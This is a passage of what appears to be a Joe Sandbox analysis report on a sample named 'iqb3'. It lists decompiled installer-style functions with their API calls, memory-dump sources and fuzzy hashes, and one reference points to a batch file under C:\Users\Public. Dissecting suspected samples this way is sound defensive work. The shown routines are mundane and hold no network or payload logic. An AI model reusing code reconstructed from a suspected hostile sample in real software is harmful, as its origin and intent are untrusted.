                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: 00b611ce2adfe02ff6c5a9eaf5ca41f632987ff226c5431869bfc43e06a7e239
                                                                      • Instruction ID: 3e5648d23b1537cbe7151ba7cdfd06ebb71b75e9977eff4765d7e8492c0e8cfe
                                                                      • Opcode Fuzzy Hash: 00b611ce2adfe02ff6c5a9eaf5ca41f632987ff226c5431869bfc43e06a7e239
                                                                      • Instruction Fuzzy Hash: A311C171905205EFDB11DF64CA889BEBBB4EF00344F20843FE441B62C0D2B84A41DB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 59%
                                                                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423710;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x422ecc =  *0x422ecc + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x422ecc, 0x7530,  *0x422eb4), 0); // executed
					}
				}
				return 0;
			}











                                                                      0x0040138a
                                                                      0x004013fa
                                                                      0x0040139b
                                                                      0x004013a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004013a2
                                                                      0x004013a3
                                                                      0x004013ad
                                                                      0x00000000
                                                                      0x00401404
                                                                      0x004013b0
                                                                      0x004013b7
                                                                      0x004013bd
                                                                      0x004013be
                                                                      0x004013c0
                                                                      0x004013c2
                                                                      0x004013b9
                                                                      0x004013b9
                                                                      0x004013ba
                                                                      0x004013ba
                                                                      0x004013c9
                                                                      0x004013cb
                                                                      0x004013f4
                                                                      0x004013f4
                                                                      0x004013c9
                                                                      0x00000000

                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                                      • Instruction ID: debc39b6c0c0c652093bc86d0143b21aa6e0fee53ad258223395c8adf4e96fc0
                                                                      • Opcode Fuzzy Hash: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                                      • Instruction Fuzzy Hash: 69012831724210ABE7294B789D04B6A3698FB10315F11853BF851F72F1D6B8DC029B5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableShow
                                                                      • String ID:
                                                                      • API String ID: 1136574915-0
                                                                      • Opcode ID: a674f952c4992ca0b0c2ad7e4aa9e05cf6c98ab2d445a723cb4c6e86d75d0f96
                                                                      • Instruction ID: 2292e0465f89c440c037b44611e353697929a97950b3395032e547bd7800e083
                                                                      • Opcode Fuzzy Hash: a674f952c4992ca0b0c2ad7e4aa9e05cf6c98ab2d445a723cb4c6e86d75d0f96
                                                                      • Instruction Fuzzy Hash: 22E0CD72B04110EBDB10BBB45E4A55E3374DF10359B104437F501F11C1D2B85C40865D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040596F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 68%
                                                                      			E0040596F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                      0x00405973
                                                                      0x00405980
                                                                      0x00405995
                                                                      0x0040599b

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\Public\iqb3.bat,80000000,00000003), ref: 00405973
                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                                      • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                                                      • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                                      • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040594A Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040594A(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                      0x0040594f
                                                                      0x00405955
                                                                      0x0040595a
                                                                      0x00405963
                                                                      0x00405963
                                                                      0x0040596c

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(?,?,00405562,?,?,00000000,00405745,?,?,?,?), ref: 0040594F
                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405963
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                      • Instruction ID: a1f521dedfcb9a291c5df24485c3a4b06dfb9301352aac2cc664dc3a40c3e92f
                                                                      • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                      • Instruction Fuzzy Hash: B0D0C972908120EBC2102738AD0889BBB55EB542717058B31F865A22B0C7304C52CAA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402519 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402519(intOrPtr __ebx, void* __edi, void* __esi) {
				intOrPtr _t26;
				void* _t35;
				void* _t38;

				 *((intOrPtr*)(_t35 - 0x2c)) = __ebx;
				_t26 = E004029E0(2);
				_t38 = _t26 - 1;
				 *((intOrPtr*)(_t35 - 0x34)) = _t26;
				if(_t38 < 0) {
					L24:
					 *0x423768 =  *0x423768 +  *(_t35 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0x34)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 0x2c));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 8) = E00405C55(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0x34)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 0x2c));
							while(1) {
								__eax = __ebp - 9;
								__eax = E004059E7( *(__ebp - 8), __ebp - 9, 1); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x18)) != __ebx) {
									 *(__ebp - 9) & 0x000000ff = E00405C3C(__edi,  *(__ebp - 9) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 9);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 8), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 9);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0x34))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t38 == 0) {
								 *(_t35 - 4) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}






                                                                      0x0040251b
                                                                      0x0040251e
                                                                      0x00402523
                                                                      0x00402526
                                                                      0x00402529
                                                                      0x00402892
                                                                      0x00402895
                                                                      0x0040252f
                                                                      0x0040252f
                                                                      0x00402536
                                                                      0x00402538
                                                                      0x00402538
                                                                      0x0040253d
                                                                      0x004025c5
                                                                      0x004025c5
                                                                      0x00000000
                                                                      0x00402543
                                                                      0x00402544
                                                                      0x0040254f
                                                                      0x00402552
                                                                      0x00000000
                                                                      0x00402554
                                                                      0x00402554
                                                                      0x00402557
                                                                      0x00402557
                                                                      0x00402560
                                                                      0x00402567
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040256c
                                                                      0x00402595
                                                                      0x0040256e
                                                                      0x00402572
                                                                      0x0040259f
                                                                      0x004025a5
                                                                      0x004025bd
                                                                      0x004025af
                                                                      0x004025af
                                                                      0x004025b2
                                                                      0x004025b2
                                                                      0x00000000
                                                                      0x0040257a
                                                                      0x0040257a
                                                                      0x0040257d
                                                                      0x00402580
                                                                      0x00402583
                                                                      0x00402586
                                                                      0x00000000
                                                                      0x00402588
                                                                      0x0040258b
                                                                      0x00000000
                                                                      0x0040258d
                                                                      0x00000000
                                                                      0x0040258d
                                                                      0x0040258b
                                                                      0x00402586
                                                                      0x00402572
                                                                      0x00000000
                                                                      0x0040256c
                                                                      0x004025c8
                                                                      0x004025c8
                                                                      0x004015a8
                                                                      0x00402663
                                                                      0x00402663
                                                                      0x00000000
                                                                      0x004015a8
                                                                      0x00402552
                                                                      0x0040253d
                                                                      0x0040289b
                                                                      0x004028a1

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID:
                                                                      • API String ID: 2111968516-0
                                                                      • Opcode ID: da523f869cfac79a04ffa3e5db67419d0ebecb9d6557fa3ad88d3eb07e21e885
                                                                      • Instruction ID: fac254026ff84b5cbf35fb89e6c76f0225adf012b2287d6b840d5e7388a07a0d
                                                                      • Opcode Fuzzy Hash: da523f869cfac79a04ffa3e5db67419d0ebecb9d6557fa3ad88d3eb07e21e885
                                                                      • Instruction Fuzzy Hash: B7212B70D05299BEDF229FA84E581EEBBB09F05304F64407BE491B63C5D1BC8A81CB2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040223B Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040223B(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E004029FD(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E004029FD(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x14)) != _t11) {
					_t11 = E004029FD(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E004029FD(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}








                                                                      0x0040223b
                                                                      0x0040223b
                                                                      0x0040223d
                                                                      0x00402241
                                                                      0x00402244
                                                                      0x0040224c
                                                                      0x00402250
                                                                      0x00402259
                                                                      0x00402259
                                                                      0x0040225e
                                                                      0x00402267
                                                                      0x00402267
                                                                      0x00402274
                                                                      0x004015a6
                                                                      0x004015a8
                                                                      0x00402663
                                                                      0x00402663
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringWrite
                                                                      • String ID:
                                                                      • API String ID: 390214022-0
                                                                      • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                                      • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                                                                      • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                                      • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004025D3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E004025D3(void* __eflags) {
				long _t6;
				long _t8;
				LONG* _t10;
				void* _t12;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t6 = E004029E0(2);
					_t8 = SetFilePointer(E00405C55(_t12, _t15), _t6, _t10,  *(_t17 - 0x18)); // executed
					if( *((intOrPtr*)(_t17 - 0x20)) >= _t10) {
						_push(_t8);
						E00405C3C();
					}
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                      0x004025d3
                                                                      0x004025d4
                                                                      0x004025e0
                                                                      0x004025ed
                                                                      0x004025f6
                                                                      0x00402838
                                                                      0x0040283a
                                                                      0x0040283a
                                                                      0x004025f6
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED
                                                                        • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: 497426c73cd14a6ee936d49042a10d0204a28c140d0682b6984c5b1f1d3fdb88
                                                                      • Instruction ID: e8ae1abfc63d14bfc62f8b5fe7a9cb53b203bfeb84c1389027ba8650a40ac2f0
                                                                      • Opcode Fuzzy Hash: 497426c73cd14a6ee936d49042a10d0204a28c140d0682b6984c5b1f1d3fdb88
                                                                      • Instruction Fuzzy Hash: 0EE04FB6A05224BBEB01BBA55E4A9BF676CDB50309B14C53BF601F00C1D3BC4C419A2E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 75%
                                                                      			E00402B07(void* __eflags, void* _a4) {
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E004029FD(0x22);
				_t9 =  *0x40a7b0; // 0x386fd70
				_t11 = RegOpenKeyExA(E00402AF2( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x423790 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}






                                                                      0x00402b1b
                                                                      0x00402b21
                                                                      0x00402b2f
                                                                      0x00402b37
                                                                      0x00402b3f

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                                      • Instruction ID: 692d63f4e87c936e9446e8fa18252424463a9f70da0c26dc4546bcf220c6e71a
                                                                      • Opcode Fuzzy Hash: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                                      • Instruction Fuzzy Hash: D7E08CB6250108BFDB40EFA4EE4BFA637ECFB14704F00C121BA08E7091CA78E5109B68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040227F Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040227F(char __ebx) {
				char _t7;
				CHAR* _t8;
				CHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x409010; // 0xa
				 *(_t21 + 0xa) = _t7;
				_t8 = E004029FD(1);
				 *(_t21 - 0x30) = E004029FD(0x12);
				GetPrivateProfileStringA(_t8,  *(_t21 - 0x30), _t21 + 0xa, _t19, 0x3ff, E004029FD(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}








                                                                      0x0040227f
                                                                      0x00402287
                                                                      0x0040228b
                                                                      0x0040229b
                                                                      0x004022b2
                                                                      0x004022b8
                                                                      0x00401721
                                                                      0x00402637
                                                                      0x0040263e
                                                                      0x0040263e
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
